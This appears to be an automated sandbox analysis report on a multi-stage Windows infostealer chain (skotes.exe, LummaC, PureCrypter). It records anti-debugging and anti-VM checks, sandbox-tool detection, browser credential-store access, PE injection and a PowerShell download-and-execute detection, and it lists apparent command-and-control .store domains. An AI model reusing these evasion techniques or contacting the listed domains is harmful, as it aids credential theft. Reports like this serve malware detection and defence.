0_2_6C66C930

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000015.00000002.2447153516.0000000000D96000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3292476617.0000000000D96000.00000040.00000001.01000000.0000000E.sdmp, 167c7bdf2f.exe, 00000018.00000002.2869925020.00000000005B0000.00000040.00000001.01000000.0000000F.sdmp, d77e539f5f.exe, 00000019.00000002.2828175101.00000000013AB000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 0000001C.00000002.2894025783.00000000007DB000.00000040.00000400.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3135528132.000000000645B000.00000040.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3122957319.00000000005B0000.00000040.00000001.01000000.0000000F.sdmp, 85c9ba9a2d.exe, 0000001E.00000002.3030979995.0000000001128000.00000040.00000001.01000000.00000011.sdmp, d77e539f5f.exe, 0000001F.00000002.3007719193.00000000013AB000.00000040.00000001.01000000.00000010.sdmp, 85c9ba9a2d.exe, 00000020.00000002.3090559494.0000000001128000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: skotes.exe, 0000001C.00000002.2901825216.0000000001508000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: Web Data.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: skotes.exe, 0000001C.00000002.2901825216.00000000014D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW{W
Source: Web Data.7.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Web Data.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: d77e539f5f.exe, 00000019.00000002.2826853766.0000000000782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Web Data.7.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 167c7bdf2f.exe, 00000021.00000003.3179838756.0000000005939000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Web Data.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000002.2412394871.0000000001442000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3301444059.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 00000018.00000002.2873224839.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000019.00000002.2826853766.0000000000752000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 00000019.00000002.2826853766.0000000000782000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.2901825216.0000000001508000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000003.3036405092.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3129335841.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, d77e539f5f.exe, 0000001F.00000002.3008594002.0000000001BD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: skotes.exe, 0000001C.00000002.2901825216.000000000149B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware4
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 167c7bdf2f.exe, 0000001D.00000002.3129335841.000000000128B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: Web Data.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Web Data.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Web Data.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Web Data.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Web Data.7.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Web Data.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Web Data.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Web Data.7.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Web Data.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Web Data.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Web Data.7.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Web Data.7.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Web Data.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Web Data.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Web Data.7.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Web Data.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: d77e539f5f.exe, 00000022.00000002.3253411166.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: d77e539f5f.exe, 00000019.00000002.2826853766.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareT
Source: Web Data.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: skotes.exe, 00000017.00000002.3301444059.0000000000F49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: DocumentsJDAKJDAAFB.exe, 00000013.00000003.2388064663.0000000001309000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
Source: Web Data.7.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2411639035.0000000000B2B000.00000040.00000001.01000000.00000003.sdmp, DocumentsJDAKJDAAFB.exe, 00000013.00000002.2417403310.00000000009E6000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000014.00000002.2446065176.0000000000D96000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000015.00000002.2447153516.0000000000D96000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000017.00000002.3292476617.0000000000D96000.00000040.00000001.01000000.0000000E.sdmp, 167c7bdf2f.exe, 00000018.00000002.2869925020.00000000005B0000.00000040.00000001.01000000.0000000F.sdmp, d77e539f5f.exe, 00000019.00000002.2828175101.00000000013AB000.00000040.00000001.01000000.00000010.sdmp, skotes.exe, 0000001C.00000002.2894025783.00000000007DB000.00000040.00000400.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3135528132.000000000645B000.00000040.00000800.00020000.00000000.sdmp, 167c7bdf2f.exe, 0000001D.00000002.3122957319.00000000005B0000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Web Data.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: DocumentsJDAKJDAAFB.exe, 00000013.00000002.2429054301.0000000001364000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\w?
Source: file.exe, 00000000.00000002.2412394871.0000000001415000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPmD
Source: Web Data.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_05230CBF Start: 05230D48 End: 05230D4E		19_2_05230CBF
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_05230246 Start: 0523025A End: 05230256		19_2_05230246

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe

Code function: 19_2_052306B4 rdtsc

19_2_052306B4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6B5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6BC410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C6BC410

Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_0081652B mov eax, dword ptr fs:[00000030h]	19_2_0081652B
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Code function: 19_2_0081A302 mov eax, dword ptr fs:[00000030h]	19_2_0081A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BCA302 mov eax, dword ptr fs:[00000030h]	20_2_00BCA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00BC652B mov eax, dword ptr fs:[00000030h]	20_2_00BC652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BCA302 mov eax, dword ptr fs:[00000030h]	21_2_00BCA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_00BC652B mov eax, dword ptr fs:[00000030h]	21_2_00BC652B

Source: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C68B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C68B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C83AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 8408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: skotes.exe PID: 9056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 167c7bdf2f.exe PID: 7848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 1888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d77e539f5f.exe PID: 2124, type: MEMORYSTR

Detected PureCrypter Trojan

Source: 167c7bdf2f.exe, 00000018.00000003.2786165532.00000000054F1000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: {"ConfigIDs":"{\"ECS\":\"P-R-1082570-1-11,P-D-42388-2-6\",\"Edge\":\"P-X-1253166-4-5,P-X-1222396-1-3,P-X-1126445-2-5,P-X-1159506-2-5,P-X-1137521-3-11,P-X-1116674-11-34,P-X-1095018-2-6,P-X-1096650-2-6,P-X-1085156-1-3,P-X-1077147-1-9,P-X-1069756-2-8,P-X-1071593-2-4,P-X-1061902-3-17,P-X-1048071-1-5,P-X-1010579-1-9,P-X-1036081-1-3,P-X-1012411-2-9,P-X-97954-9-100,P-R-1068861-4-11,P-R-1008497-12-13,P-R-87486-2-17,P-R-67067-6-63,eej45377:646690,v1_disable_abandoned_cart:506070,41612551:479862,cfg5e884:560003,eggf0128:472101,sendtabqr:498558,edauth0529:481519,9ffeg962:402950,domexpansion_v1:408272,ed0317:378541,producttrackingalertsettings_v1cf:458226,2chfa640:363442,edpas404:384675,hjd07315:315108,edenh823:312573,v1_onlineselextraction:330872,edklo447:358232,linkui:481501\",\"EdgeConfig\":\"P-R-1457891-1-5,P-R-1279375-1-7,P-R-1221542-1-5,P-R-1176033-4-5,P-R-1174322-1-4,P-R-1129815-1-5,P-R-1148262-1-5,P-R-1147287-1-6,P-R-1136203-1-4,P-R-1133477-1-4,P-R-1130507-1-6,P-R-1113531-4-9,P-R-1099640-1-4,P-R-1098501-1-7,P-R-1090419-1-5,P-R-1082109-1-6,P-R-1082170-11-26,P-R-1052391-1-8,P-R-1036635-2-5,P-R-110491-24-85,P-R-68474-9-12,P-R-61206-14-20,P-R-61153-10-15,P-R-60617-7-21,P-R-45373-8-85,P-R-46265-41-108,P-D-1150672-1-4\",\"EdgeDomainActions\":\"P-R-1093245-1-19,P-R-1037936-1-14,P-R-1024693-1-11,P-R-108604-1-36,P-R-78306-1-18,P-R-73626-1-17,P-R-71025-5-13,P-R-63165-4-26,P-R-53243-2-7,P-R-40093-3-26,P-R-38744-7-97,P-R-31899-21-484,P-D-1138318-1-3,P-D-98331-6-32\",\"EdgeFirstRunConfig\":\"P-R-1075865-1-7\",\"Segmentation\":\"P-R-1159985-1-5,P-R-1113915-25-11,P-R-1098334-1-6,P-R-66078-1-3,P-R-66077-1-5,P-R-60882-1-2,P-R-43082-3-5,P-R-42744-1-2\"}","Edge":{"AccountLevelSyncReclaim":{"enableFeatures":["msAccountLevelSyncConsent","msNurturingAccountLevelSyncConsentSyncOff","msNurturingAccountLevelSyncConsentSyncOn"]},"AdsPlatformXEdgeexp":{"enableFeatures":["msEdgeAdPlatformUI","msEdgeAdPlatformBingPathsV3","msEdgeAdPlatformProtobufMigration","msEdgeAdPlatformUseIdentity"]},"ArrestUserChurn":{"enableFeatures":["msLoadChromeWebstoreByDefault"]},"DefaultBrowserBannerExternalStableRollout":{"enableFeatures":["msNurturingDefaultBrowserBannerCloseBtn","msNurturingUrlParser","msEdgeNurFIrisSupport"],"parameters":[{"name":"DismissalCap","value":"1000"}]},"DisablePageActionIcons":{"enableFeatures":["msOmniboxDisablePageActionIcons"],"parameters":[{"name":"msDisableOmniboxTriggeredIcon","value":"12,16"}]},"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"EdgeOnRampShowVersionWhatsNew":{"enableFeatures":["msEdgeOnRampShowWhatsNew"],"parameters":[{"name":"Browser Version","value":"130.0.0.0"}]},"EdgeShoppingDisableAbandonedCart":{"disableFeatures":["msEdgeShoppingPwiloNotificationsAbandonedCarts"]},"EdgeShoppingDomMutationExpansion":{"enableFeatures":["msShoppingExp67"]},"EdgeShoppingOnlineSelectorExtraction":{"enableFeatures":["msShoppingExp1"]},"EdgeVpnAllSites":{"enableFeatures":["msEnableVpnA

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Memory written: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: scriptyprefej.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: navygenerayk.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: founpiuer.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: necklacedmny.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: thumbystriw.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: fadehairucw.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: crisiwarny.store
Source: 167c7bdf2f.exe, 00000018.00000002.2869296797.00000000003D1000.00000040.00000001.01000000.0000000F.sdmp	String found in binary or memory: presticitpo.store

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAKJDAAFB.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsJDAKJDAAFB.exe "C:\Users\user\DocumentsJDAKJDAAFB.exe"
Source: C:\Users\user\DocumentsJDAKJDAAFB.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe "C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe "C:\Users\user\AppData\Local\Temp\1005503001\d77e539f5f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe "C:\Users\user\AppData\Local\Temp\1005505001\85c9ba9a2d.exe"

Source: file.exe	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.2411639035.0000000000B2B000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C68B341 cpuid

0_2_6C68B341

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005502001\167c7bdf2f.exe VolumeInformation
